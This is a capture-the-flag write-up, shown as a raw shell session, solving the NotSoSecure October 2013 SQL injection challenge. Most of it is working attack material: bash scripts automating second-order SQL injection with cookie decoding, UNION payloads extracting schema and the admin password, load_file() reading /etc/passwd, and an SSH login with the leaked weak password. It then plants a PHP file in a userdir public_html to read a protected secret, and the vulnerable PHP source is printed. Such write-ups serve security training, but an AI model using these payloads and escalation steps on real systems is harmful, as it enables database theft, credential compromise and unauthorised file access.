# NotSoSecure CTF October 2k13

# curl --silent --request POST --data "myusername=mu&mypassword=mp" http://ctf.notsosecure.com/71367217217126217712/checklogin.php | xxd -p -r ; echo
secret_register.html
# cat console
#!/bin/bash

echo -n "> "
while read line; do 
 username=`echo -n "$line" | sed -e "s/'/%27/g" -e 's/ /+/g'`
 curl --silent --cookie-jar nss --cookie nss --request GET "http://ctf.notsosecure.com/71367217217126217712/register.php?regname=$username&regemail=mail&regpass1=pass&regpass2=pass" > /dev/null 2>&1
 curl --silent --cookie-jar nss --cookie nss --request POST --data "myusername=$line&mypassword=pass" "http://ctf.notsosecure.com/71367217217126217712/checklogin.php" > /dev/null 2>&1
 curl --silent --cookie-jar nss --cookie nss "http://ctf.notsosecure.com/71367217217126217712/uber_secret.php" > /dev/null 2>&1
 osi=`tail -n1 nss | awk '{print $7}'`
 echo $osi | sed 's/%3D/=/g' | base64 -d ; echo
 echo -n "> "
done
# ./console
> ' and false union select table_name,null from information_schema.columns where table_schema not like '%_schema' and table_schema!='mysql' group by table_name limit 2,1 --
users
> ' and false union select column_name,null from information_schema.columns where table_name='users' limit 2,1 --
password
> ' and false union select password,null from users where name='admin' --
sqlilabRocKs!!
# curl --silent --cookie-jar nss --cookie nss --request POST --data 'myusername=admin&amypassword=sqlilabRocKs!!' "http://ctf.notsosecure.com/71367217217126217712/checklogin.php"
# curl --silent --cookie-jar nss --cookie nss "http://ctf.notsosecure.com/71367217217126217712/uber_secret.php" | grep -A 3 Success
   <h1>Success!</h1><br><a href='login.php'> click here to go back</a><br>
<div>Well done, Flag is 815290. 2nd flag is in file secret.txt</div>
<h3 class="h3_admin">You are Admin!</h3>
    <div><img src="images/login/smiley.gif"></div>
# cat secret
#!/bin/bash

echo -n "> "
while read line; do 
 echo "'$line'"
 mu="' and false union select load_file('$line'),null -- 123"
 username=`echo -n "$mu" | sed -e "s/'/%27/g" -e 's/ /+/g'`
 echo $username 
 curl --silent --cookie-jar nss --cookie nss --request GET "http://ctf.notsosecure.com/71367217217126217712/register.php?regname=$username&regemail=mail&regpass1=pass&regpass2=pass" > /dev/null 2>&1
 curl --silent --cookie-jar nss --cookie nss --request POST --data "myusername=$mu&mypassword=pass" "http://ctf.notsosecure.com/71367217217126217712/checklogin.php" > /dev/null 2>&1
 curl --silent --cookie-jar nss --cookie nss "http://ctf.notsosecure.com/71367217217126217712/uber_secret.php" > /dev/null 2>&1
 osi=`tail -n1 nss | awk '{print $7}'`
 echo $osi | sed 's/%3D/=/g' | base64 -d ; echo
 echo -n "> "
done
# ./secret
> /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:106::/var/run/dbus:/bin/false
whoopsie:x:104:107::/nonexistent:/bin/false
landscape:x:105:110::/var/lib/landscape:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
postgres:x:107:112:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
ctf:x:1000:1000:,,,:/home/ctf:/bin/bash
temp123:x:1001:1001:weakpassword1:/home/temp123:/bin/sh
ntop:x:108:116::/var/lib/ntop:/bin/false
# ssh temp123@ctf.notsosecure.com
temp123@ctf.notsosecure.com's password:weakpassword1
$ find / -name secret.txt 2> /dev/null
/tmp/secret.txt
/secret.txt
$ cat /tmp/secret.txt
n0th1ng to s33...
$ cat /secret.txt
cat: /secret.txt: Permission denied
$ ls -l /secret.txt
-r-------- 1 www-data www-data 684 Oct 25 07:46 /secret.txt
$ cat /home/temp123/.* | less
$ cd /var/www
$ ls -l
total 40
drwxr-xr-x 4 root root 4096 Oct 25 07:47 71367217217126217712
drwxr-xr-x 3 root root 4096 Oct  7 22:17 css
drwxr-xr-x 4 root root 4096 Oct  7 22:17 ctf
drwxr-xr-x 3 root root 4096 Oct  7 21:59 ctf-ver3
-rw-r--r-- 1 root root  894 Sep 12 08:20 favicon.ico
drwxr-xr-x 2 root root 4096 Oct  7 22:17 img
-rw-r--r-- 1 root root  177 Oct  4 19:43 _index.html
-rw-r--r-- 1 root root 3929 Oct  9 08:04 index.html
-rw-r--r-- 1 root root 2654 Oct  7 22:17 index.html.bak
drwxr-xr-x 4 root root 4096 Oct 27 10:03 leaderboard
$ cd 71367217217126217712
$ ls -l
total 60
-rw-r--r-- 1 root root 1327 Oct 25 07:41 checklogin.php
drwxr-xr-x 2 root root 4096 Oct 22 09:54 css
-rw-r--r-- 1 root root 1607 Oct 22 07:47 error.php
-rw-r--r-- 1 root root  894 Oct 22 02:04 favicon.ico
drwxr-xr-x 4 root root 4096 Oct 22 02:04 images
-rw-r--r-- 1 root root 2092 Oct 22 07:44 index.php
-rw-r--r-- 1 root root 2092 Oct 22 07:45 login.php
-rw-r--r-- 1 root root  991 Oct 22 08:16 _Logout.php
-rw-r--r-- 1 root root 1238 Oct 22 09:40 Logout.php
-rw-r--r-- 1 root root 3040 Oct 22 08:00 _register.php
-rw-r--r-- 1 root root 3060 Oct 25 07:47 register.php
-rw-r--r-- 1 root root 1745 Oct 22 07:53 _secret_register.html
-rw-r--r-- 1 root root 1882 Oct 23 14:26 secret_register.html
-rw-r--r-- 1 root root 3324 Oct 22 08:05 _uber_secret.php
-rw-r--r-- 1 root root 3316 Oct 25 07:47 uber_secret.php
$ cat uber_secret.php
<?php
error_reporting(0);
session_start();
if(!session_is_registered(myusername)){
header("location:login.php");
die;
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>SQL</title>
<link rel="stylesheet" href="css/screen.css" type="text/css" media="screen" title="default" />

</head>
<body> 

<div id="page-top-outer">    

<div id="page-top">

 <div id="logo">
 </div>

 <div id="top-search">
  <table border="0" cellpadding="0" cellspacing="0">
  <tr>
  <td>
  <a href="Logout.php"><button>Logout</button></a>
  </td>
  </tr>
  </table>
 </div>

  <div class="clear"></div>

</div>
</div> 
<div class="clear"> </div><br />
<div class="clear"></div>
<div id="content-outer">
<div id="content">
 <div id="page-heading">
 </div>
<table border="0" width="100%" cellpadding="0" cellspacing="0" id="content-table">
 <tr>
  <th rowspan="3" class="sized"><img src="images/shared/side_shadowleft.jpg" width="20" height="300" alt="" /></th>
  <th class="topleft"></th>
  <td id="tbl-border-top"> </td>
  <th class="topright"></th>
  <th rowspan="3" class="sized"><img src="images/shared/side_shadowright.jpg" width="20" height="300" alt="" /></th>
 </tr>
 <tr>
  <td id="tbl-border-left"></td>
  <td>
  <div id="content-table-inner">

   <div id="table-content">
   <?php if($_SESSION['myusername']=='admin')
{?>
<h1>Success!</h1><br><a href='login.php'> click here to go back</a><br>
<div><?echo "Well done, Flag is 815290. 2nd flag is in file secret.txt";?></div>
<h3 class="h3_admin">You are Admin!</h3>
    <div><img src="images/login/smiley.gif"></div>
<?php }
 else { ?>
   <h3 class="h3_admin">You are not Admin!</h3>
    <div><img src="images/login/sad smiely.gif"></div>
   
   </div>
   <div style="padding-left:350px;font-weight:bold; font-size:20px;color:#92B22C;">
<?php
$host="localhost"; 
$username="2ndorder"; 
$password="2ndorder"; 
$db_name="2ndorder"; 
$tbl_name="users"; 
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");

$sql="SELECT email,name FROM $tbl_name WHERE name='".$_SESSION['myusername']." '";

$result=mysql_query($sql);
$row = mysql_fetch_row($result);
$login1=$row[0];

echo "Logged in as <b>".htmlentities($_SESSION['myusername'])."</b><br>";?> 
<?
setcookie(session_id,base64_encode($login1));
?> 
</div>
 <?php } ?>
   <div class="clear"></div>
   
  </div>
  </td>
  <td id="tbl-border-right"></td>
 </tr>
 <tr>
  <th class="sized bottomleft"></th>
  <td id="tbl-border-bottom"> </td>
  <th class="sized bottomright"></th>
 </tr>
 </table>
 <div class="clear"> </div>
</div>
<div class="clear"> </div>
</div>
<div class="clear"> </div>
 
 <div class="footer">
  <ul>
   <li style="margin-top: 20px;">powered by</li>
   <li><a href="http://www.securitytube-training.com/virtual-labs/sql-injection-labs/">
    <img src="images/login/sql.jpg" class="img_login">
   </a></li>
   <li style="margin-top: 20px;">© NotSoSecure</li>
  </ul>
 </div>
</body>
</html>
$ cat register.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>SQLi labs</title>
<link rel="stylesheet" href="css/screen.css" type="text/css" media="screen" title="default" />
<link rel="shortcut icon" href="../favicon.ico">


</head>
<body> 

<div id="page-top-outer">    


<div id="page-top">

 
 <div id="logo">
 </div>

 
 
 <div id="top-search">
  <table border="0" cellpadding="0" cellspacing="0">
  <tr>
  <td>
  
  </td>
  </tr>
  </table>
 </div>
  
  <div class="clear"></div>

</div>

</div>
 
<div class="clear"> </div>
  <div class="clear"></div>
<div id="content-outer">
<div id="content">
 <div id="page-heading">
 </div>
 <table border="0" width="100%" cellpadding="0" cellspacing="0" id="content-table">
 <tr>
  <th rowspan="3" class="sized"><img src="images/shared/side_shadowleft.jpg" width="20" height="300" alt="" /></th>
  <th class="topleft"></th>
  <td id="tbl-border-top"> </td>
  <th class="topright"></th>
  <th rowspan="3" class="sized"><img src="images/shared/side_shadowright.jpg" width="20" height="300" alt="" /></th>
 </tr>
 <tr>
  <td id="tbl-border-left"></td>
  <td>
  <div id="content-table-inner">
   <div id="table-content">
   <?php
error_reporting(0);
if($_GET["regname"] && $_GET["regemail"] && $_GET["regpass1"] && $_GET["regpass2"] )
{
if($_GET["regpass1"]==$_GET["regpass2"])
{
$servername="localhost";
$username="2ndorder";
$conn= mysql_connect($servername,$username,'2ndorder','2ndorder')or die(mysql_error());
mysql_select_db("2ndorder",$conn);
$sql1="select * from users where name ='".mysql_real_escape_string($_REQUEST['regname'])."'";
$result1=mysql_query($sql1);
$row1 = mysql_fetch_row($result1);
$count1=mysql_num_rows($result1);
if ($count1>0)
{
echo "<a href='login.php'>click here to login</a><br>";
die("User Already Exist");
}
$sql="insert into users (name,email,password)values('".mysql_real_escape_string($_GET[regname])."','".mysql_real_escape_string($_GET[regemail])."','".mysql_real_escape_string($_GET[regpass1])."')";
$result=mysql_query($sql,$conn) or die(mysql_error());
print "You have sucessfully registered!<br>";
print "<a href='login.php'>go to login page</a>";
}
else print "passwords don't match";
}
else { ?> <div class="register_invelid">Invaild data</div>
<?php }
?>
</div>
   <div class="clear"></div>
  </div>
  </td>
  <td id="tbl-border-right"></td>
 </tr>
 <tr>
  <th class="sized bottomleft"></th>
  <td id="tbl-border-bottom"> </td>
  <th class="sized bottomright"></th>
 </tr>
 </table>
 <div class="clear"> </div>

</div>
<div class="clear"> </div>

<div class="footer">
 <ul>
  <li style="margin-top: 20px;" >powered by</li>
  <li><a href="http://www.securitytube-training.com/virtual-labs/sql-injection-labs/">
   <img class="img_login" src="images/login/sql.jpg">
  </a></li>
  <li style="margin-top: 20px;">© NotSoSecure</li>
 </ul>
 
</div>
</div> 
</body>
</html>
$ apachectl -M
/usr/sbin/apachectl: 87: ulimit: error setting limit (Operation not permitted)
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
Loaded Modules:
 core_module (static)
 log_config_module (static)
 logio_module (static)
 mpm_prefork_module (static)
 http_module (static)
 so_module (static)
 alias_module (shared)
 auth_basic_module (shared)
 authn_file_module (shared)
 authz_default_module (shared)
 authz_groupfile_module (shared)
 authz_host_module (shared)
 authz_user_module (shared)
 autoindex_module (shared)
 cgi_module (shared)
 deflate_module (shared)
 dir_module (shared)
 env_module (shared)
 mime_module (shared)
 negotiation_module (shared)
 php5_module (shared)
 reqtimeout_module (shared)
 setenvif_module (shared)
 status_module (shared)
 userdir_module (shared)
Syntax OK
$ cat /etc/apache2/mods-enabled/userdir.conf
<IfModule mod_userdir.c>
        UserDir public_html
        UserDir disabled root

        <Directory /home/*/public_html>
                AllowOverride FileInfo AuthConfig Limit Indexes
                Options MultiViews Indexes SymLinksIfOwnerMatch IncludesNoExec
                <Limit GET POST OPTIONS>
                        Order allow,deny
                        Allow from all
                </Limit>
                <LimitExcept GET POST OPTIONS>
                        Order deny,allow
                        Deny from all
                </LimitExcept>
        </Directory>
</IfModule>
$ cd /home/temp123
$ mkdir public_html
$ vi index.php
<?php echo file_get_contents('/secret.txt');
<ESC>:wq
$ exit
# curl --silent http://ctf.notsosecure.com/~temp123/index.php
Well done, 2nd Flag is 128738213812990.

email both the flags to ctf@notsosecure.com with subject CTF FLAGS!

make sure you delete all the files you have created on the server so you dont allow other users easy points by using the files left by you on the server.

Please provide a detailed write up to qualify for cash prize!
The person with best write-up wins. You are allowed to publish the write-up on public site, but please do this after the CTF has finished (sunday, 27th October).

Hope you enjoyed the CTF. This was taken from one of challenges we have on SQLi Labs. To practice more on this visit our SQLi Labs.

The next public CTF will take place in December.

Thanks
Sid